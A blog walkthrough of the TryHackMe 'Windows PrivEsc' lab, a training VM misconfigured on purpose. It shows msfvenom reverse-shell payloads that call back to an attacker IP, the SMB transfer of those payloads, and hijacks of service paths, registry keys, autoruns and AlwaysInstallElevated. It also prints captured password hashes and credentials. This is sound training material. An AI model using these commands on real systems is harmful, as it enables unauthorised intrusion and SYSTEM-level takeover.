Tryhackme - Windows PrivEsc

Tryhackme – Windows PrivEsc

In this walk through, we will be going through the Windows PrivEsc from Tryhackme. This room is rated as Medium on the platform and let us practice our Windows Privilege Escalation skills on an intentionally misconfigured Windows VM with multiple ways to get admin/SYSTEM. So, let’s get started without any delay.

Windows PrivEsc

Task 1 – Deploy the Vulnerable Windows VM

Task 1 - Deploy the Vulnerable Windows VM

Task 2 – Generate a Reverse Shell Executable

Question 1 – Generate a reverse shell executable and transfer it to the Windows VM. Check that it works!

Done

wh1terose@fsociety:~/CTF/TryHackme/Windows Privesc$ sudo msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.18.11.103 LPORT=4444 -f exe -o reverse.exe
/usr/bin/msfvenom: 14: cd: can't cd to /home/wh1terose/CTF/TryHackme/Windows
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: reverse.exe

msfvenom payload

wh1terose@fsociety:~/CTF/TryHackme/WindowsPrivesc$ sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali .
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.225.25,49812)
[*] AUTHENTICATE_MESSAGE (WIN-QBA94KB3IOF\user,WIN-QBA94KB3IOF)
[*] User WIN-QBA94KB3IOF\user authenticated successfully
[*] user::WIN-QBA94KB3IOF:4141414141414141:465098c53c0be448156c5c7263e69cbf:0101000000000000009f7b8e5783d90116c1888a72084c21000000000100100073005600420053006e0079006a0065000300100073005600420053006e0079006a0065000200100061004f005a006d004e007500450044000400100061004f005a006d004e0075004500440007000800009f7b8e5783d901060004000200000008003000300000000000000000000000002000008f4f897470911f8ee7ca820d6a5763695c6af5de3e0a5e30d62a0f7bae1ff2cc0a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310038002e00310031002e00310030003300000000000000000000000000
[-] Unknown level for query path info! 0x109
[*] Disconnecting Share(1:IPC$)
[*] Disconnecting Share(2:KALI)
[*] Handle: 'ConnectionResetError' object is not subscriptable
[*] Closing down connection (10.10.225.25,49812)
[*] Remaining connections []

smbserver.py

reverse.exe

Task 2 - Generate a Reverse Shell Executable

Task 3 – Service Exploits – Insecure Service Permissions

Question 1 – What is the original BINARY_PATH_NAME of the daclsvc service?

C:\PrivEsc>accesschk.exe /accepteula -uwcqv user daclsvc
RW daclsvc
        SERVICE_QUERY_STATUS
        SERVICE_QUERY_CONFIG
        SERVICE_CHANGE_CONFIG
        SERVICE_INTERROGATE
        SERVICE_ENUMERATE_DEPENDENTS
        SERVICE_START
        SERVICE_STOP
        READ_CONTROL

C:\PrivEsc>sc qc daclsvc
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: daclsvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files\DACL Service\daclservice.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : DACL Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\PrivEsc>sc config daclsvc binpath= "\"C:\PrivEsc\reverse.exe\""
[SC] ChangeServiceConfig SUCCESS

C:\PrivEsc>net start daclsvc

Task 3 - Service Exploits - Insecure Service Permissions

C:\Program Files\DACL Service\daclservice.exe

Task 4 – Service Exploits – Unquoted Service Path

Question 1 – What is the BINARY_PATH_NAME of the unquotedsvc service?

C:\PrivEsc>sc qc daclsvc
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: daclsvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files\DACL Service\daclservice.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : DACL Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\PrivEsc>sc config daclsvc binpath= "\"C:\PrivEsc\reverse.exe\""
[SC] ChangeServiceConfig SUCCESS

C:\PrivEsc>net start daclsvc
The service is not responding to the control function.

More help is available by typing NET HELPMSG 2186.


C:\PrivEsc>sc qc unquotedsvc
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: unquotedsvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Unquoted Path Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\PrivEsc>C:\PrivEsc\accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service\"
C:\Program Files\Unquoted Path Service
  Medium Mandatory Level (Default) [No-Write-Up]
  RW BUILTIN\Users
  RW NT SERVICE\TrustedInstaller
  RW NT AUTHORITY\SYSTEM
  RW BUILTIN\Administrators

C:\PrivEsc>copy C:\PrivEsc\reverse.exe "C:\Program Files\Unquoted Path Service\Common.exe"
        1 file(s) copied.

C:\PrivEsc>net start unquotedsvc

unquotedpathservice.exe

Task 4 - Service Exploits - Unquoted Service Path

 C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe

Task 5 – Service Exploits – Weak Registry Permissions

Question 1 – Read and follow along with the above.

Done

C:\PrivEsc>sc qc regsvc
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: regsvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files\Insecure Registry Service\insecureregistryservice.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Insecure Registry Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\PrivEsc>C:\PrivEsc\accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc
HKLM\System\CurrentControlSet\Services\regsvc
  Medium Mandatory Level (Default) [No-Write-Up]
  RW NT AUTHORITY\SYSTEM
        KEY_ALL_ACCESS
  RW BUILTIN\Administrators
        KEY_ALL_ACCESS
  RW NT AUTHORITY\INTERACTIVE
        KEY_ALL_ACCESS

C:\PrivEsc>reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\PrivEsc\reverse.exe /f
The operation completed successfully.

C:\PrivEsc>net start regsvc

Task 5 - Service Exploits - Weak Registry Permissions

Task 6 – Service Exploits – Insecure Service Executables

Question 1 – Read and follow along with the above.

Done

C:\PrivEsc>sc qc filepermsvc
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: filepermsvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files\File Permissions Service\filepermservice.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : File Permissions Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\PrivEsc>C:\PrivEsc\accesschk.exe /accepteula -quvw "C:\Program Files\File Permissions Service\filepermservice.exe"
C:\Program Files\File Permissions Service\filepermservice.exe
  Medium Mandatory Level (Default) [No-Write-Up]
  RW Everyone
        FILE_ALL_ACCESS
  RW NT AUTHORITY\SYSTEM
        FILE_ALL_ACCESS
  RW BUILTIN\Administrators
        FILE_ALL_ACCESS
  RW WIN-QBA94KB3IOF\Administrator
        FILE_ALL_ACCESS
  RW BUILTIN\Users
        FILE_ALL_ACCESS

C:\PrivEsc>copy C:\PrivEsc\reverse.exe "C:\Program Files\File Permissions Service\filepermservice.exe" /Y
The system cannot find the file specified.

C:\PrivEsc>copy \\10.18.11.103\kali\reverse.exe C:\PrivEsc\reverse.exe
        1 file(s) copied.

C:\PrivEsc>copy C:\PrivEsc\reverse.exe "C:\Program Files\File Permissions Service\filepermservice.exe" /Y
        1 file(s) copied.

C:\PrivEsc>sc qc filepermsvc
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: filepermsvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files\File Permissions Service\filepermservice.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : File Permissions Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\PrivEsc>C:\PrivEsc\accesschk.exe /accepteula -quvw "C:\Program Files\File Permissions Service\filepermservice.exe"
C:\Program Files\File Permissions Service\filepermservice.exe
  Medium Mandatory Level (Default) [No-Write-Up]
  RW Everyone
        FILE_ALL_ACCESS
  RW NT AUTHORITY\SYSTEM
        FILE_ALL_ACCESS
  RW BUILTIN\Administrators
        FILE_ALL_ACCESS
  RW WIN-QBA94KB3IOF\Administrator
        FILE_ALL_ACCESS
  RW BUILTIN\Users
        FILE_ALL_ACCESS

C:\PrivEsc>copy C:\PrivEsc\reverse.exe "C:\Program Files\File Permissions Service\filepermservice.exe" /Y
        1 file(s) copied.

C:\PrivEsc>net start filepermsvc
The service is not responding to the control function.

More help is available by typing NET HELPMSG 2186.

filepermservice.exe

Task 6 - Service Exploits - Insecure Service Executables

Task 7 – Registry – AutoRuns

Question 1 – Read and follow along with the above.

Done

C:\PrivEsc>reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    My Program    REG_SZ    "C:\Program Files\Autorun Program\program.exe"


C:\PrivEsc>C:\PrivEsc\accesschk.exe /accepteula -wvu "C:\Program Files\Autorun Program\program.exe"

AccessChk v4.02 - Check access of files, keys, objects, processes or services
Copyright (C) 2006-2007 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\Program Files\Autorun Program\program.exe
  Medium Mandatory Level (Default) [No-Write-Up]
  RW Everyone
        FILE_ALL_ACCESS
  RW NT AUTHORITY\SYSTEM
        FILE_ALL_ACCESS
  RW BUILTIN\Administrators
        FILE_ALL_ACCESS
  RW WIN-QBA94KB3IOF\Administrator
        FILE_ALL_ACCESS
  RW BUILTIN\Users
        FILE_ALL_ACCESS

C:\PrivEsc>copy C:\PrivEsc\reverse.exe "C:\Program Files\Autorun Program\program.exe" /Y
        1 file(s) copied.

program.exe

nt authority

Task 8 – Registry – AlwaysInstallElevated

Question 1 – Read and follow along with the above.

Done

wh1terose@fsociety:~/CTF/TryHackme/WindowsPrivesc$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.18.11.103 LPORT=1234 -f msi -o reverse.msi
[?] Would you like to init the webservice? (Not Required) [no]: no
[?] Would you like to delete your existing data and configurations? []: yes
Clearing http web data service credentials in msfconsole
Running the 'init' command for the database:
Existing database found, attempting to start it
Starting database at /home/wh1terose/.msf4/db...success
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of msi file: 159744 bytes
Saved as: reverse.msi
wh1terose@fsociety:~/CTF/TryHackme/WindowsPrivesc$ ls
reverse.exe  reverse.msi
wh1terose@fsociety:~/CTF/TryHackme/WindowsPrivesc$ sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali .
[sudo] password for wh1terose: 
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.165.120,49710)
[*] AUTHENTICATE_MESSAGE (WIN-QBA94KB3IOF\user,WIN-QBA94KB3IOF)
[*] User WIN-QBA94KB3IOF\user authenticated successfully
[*] user::WIN-QBA94KB3IOF:4141414141414141:b978bb131fc26e4ee84d9fc63507ea58:01010000000000000054203b1e84d901dbcec77ee99a0fbd000000000100100062004b007700440048005200520077000300100062004b0077004400480052005200770002001000440046005800680066007000700072000400100044004600580068006600700070007200070008000054203b1e84d901060004000200000008003000300000000000000000000000002000007d4b5ce9918fb05e3cd6a3d21ca39d3aa0b524095c2842e45278ef703d4077850a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310038002e00310031002e00310030003300000000000000000000000000
[-] Unknown level for query path info! 0x109
[*] Disconnecting Share(1:IPC$)
[*] Disconnecting Share(2:KALI)

msfvenom payload

C:\PrivEsc>reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1


C:\PrivEsc>reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1


C:\PrivEsc>copy \\10.18.11.103\kali\reverse.msi C:\PrivEsc\reverse.msi
        1 file(s) copied.

C:\PrivEsc>msiexec /quiet /qn /i C:\PrivEsc\reverse.msi

C:\PrivEsc>

reverse.msi

nt authority

Task 9 – Passwords – Registry

Question 1 – What was the admin password you found in the registry?

password123

Task 10 – Passwords – Saved Creds

Question 1 – Read and follow along with the above.

Done

C:\PrivEsc>cmdkey /list

Currently stored credentials:

    Target: WindowsLive:target=virtualapp/didlogical
    Type: Generic
    User: 02nfpgrklkitqatu
    Local machine persistence

    Target: Domain:interactive=WIN-QBA94KB3IOF\admin
    Type: Domain Password
    User: WIN-QBA94KB3IOF\admin


C:\PrivEsc>runas /savecred /user:admin C:\PrivEsc\reverse.exe
Attempting to start C:\PrivEsc\reverse.exe as user "WIN-QBA94KB3IOF\admin" ...

C:\PrivEsc>savecred.bat

C:\PrivEsc>cmdkey /list

Currently stored credentials:

    Target: WindowsLive:target=virtualapp/didlogical
    Type: Generic
    User: 02nfpgrklkitqatu
    Local machine persistence

    Target: Domain:interactive=WIN-QBA94KB3IOF\admin
    Type: Domain Password
    User: WIN-QBA94KB3IOF\admin


C:\PrivEsc>

cmdkey/list

Task 11 – Passwords – Security Account Manager (SAM)

Question 1 – What is the NTLM hash of the admin user?

a9fdfa038c4b75ebc76dc855dd74f0da

Task 11 - Passwords - Security Account Manager (SAM)

Task 12 – Passwords – Passing the Hash

Task 12 - Passwords - Passing the Hash

Task 13 – Scheduled Tasks

Task 13 - Scheduled Tasks

Task 14 – Insecure GUI Apps

Task 14 - Insecure GUI Apps

Task 15 – Startup Apps

Task 15 - Startup Apps

Task 16 – Token Impersonation – Rogue Potato

Question 1 – Name one user privilege that allows this exploit to work.

SeImpersonatePrivilege

Question 2 – Name the other user privilege that allows this exploit to work.

SeAssignPrimaryTokenPrivilege

Task 17 – Token Impersonation – PrintSpoofer

Task 17 - Token Impersonation - PrintSpoofer

Task 18 – Privilege Escalation Scripts

Task 18 - Privilege Escalation Scripts

Also Read: Tryhackme – Windows Fundamentals 2

So that was “Windows PrivEsc” for you. In this room, we covered a variety of Windows privilege escalation techniques which we can use once we landed in a Windows machine. Well, the best thing on any machine is to be System/admin and today we have learned on how we can get to that point. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top